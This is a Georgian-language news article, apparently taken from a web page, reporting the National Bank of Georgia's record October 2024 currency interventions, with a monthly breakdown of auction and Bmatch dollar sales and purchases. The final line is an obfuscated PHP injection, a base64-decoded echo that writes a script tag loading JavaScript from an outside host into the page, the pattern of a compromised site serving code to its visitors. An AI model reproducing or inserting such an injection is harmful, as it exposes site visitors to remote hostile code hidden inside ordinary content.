tube
ავერსი jaluzi

საქართველოს ეროვნულმა ბანკმა დღეს, ოქტომბრის განმავლობაში სავალუტო ბაზარზე განხორციელებული ოპერაციების დეტალური სტატისტიკა გამოაქვეყნა. სტატისტიკის მიხედვით გასული თვის განმავლობაში სებ-მა რეკორდული მოცულობის ინტერვენციები განახორციელა.

სავალუტო აუქციონის გზით გაყიდული იყო 213.4 მილიონი დოლარი, ხოლო Bmatch პლატფორმით ინტერვენციების მოცულობა 377.7 მილიონი დოლარი იყო, შესაბამისად, ჯამური გაყიდვები გასულ თვეში 591 მილიონ დოლარს შეადგენდა. მთლიანობაში 2024 წლის 10 თვის განმავლობაში კი ეროვნულმა ბანკმა გაყიდა 917 და იყიდა 329 მილიონი დოლარი, ანუ წმინდა გაყიდვებმა 588 მილიონი დოლარი შეადგინა.

ეროვნული ბანკის მიერ 2024 წლის 10 თვეში განხორციელებული სავალუტო ინტერვენციების დეტალური სტატისტიკა ასე ნაწილდება:

  • იანვარი - შესყიდვა $8.1 მილიონი Bmatch;
  • თებერვალი - შესყიდვა $77.5 მილიონი Bmatch;
  • მარტი - შესყიდვა $127.9 მილიონი Bmatch;
  • აპრილი - შესყიდვა $73.1 მილიონი Bmatch;
  • მაისი - გაყიდვა $108.7 მილიონი აუქციონით და გაყიდვა $9.1 მილიონი Bmatch-ით;
  • ივნისი - გაყიდვა $60 მილიონი აუქციონით და გაყიდვა $42 მილიონი Bmatch-ით;
  • ივლისი - შესყიდვა $1.9 მილიონი Bmatch-ით;
  • აგვისტო - შესყიდვა $41 მილიონი Bmatch-ით;
  • სექტემბერი - გაყიდვა $106.5 მილიონი Bmatch-ით;
  • ოქტომბერი - გაყიდვა $213.4 მილიონი აუქციონით და გაყიდვა $377.7 მილიონი Bmatch-ით.

ჯამში გაყიდვები 917 მილიონი, შესყიდვები 329 მილიონი დოლარი. შედეგად, წმინდა გაყიდვები წელს 588 მილიონი დოლარი შეადგინა.

ცნობისთვის, 2024 წლის აპრილში საერთაშორისო სავალუტო ფონდმა განაცხადა, რომ რეზერვების დონე ადეკვატურობის ნიშნულს ჩამოსცდა და მისი შევსება იყო საჭირო. 

 
94
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");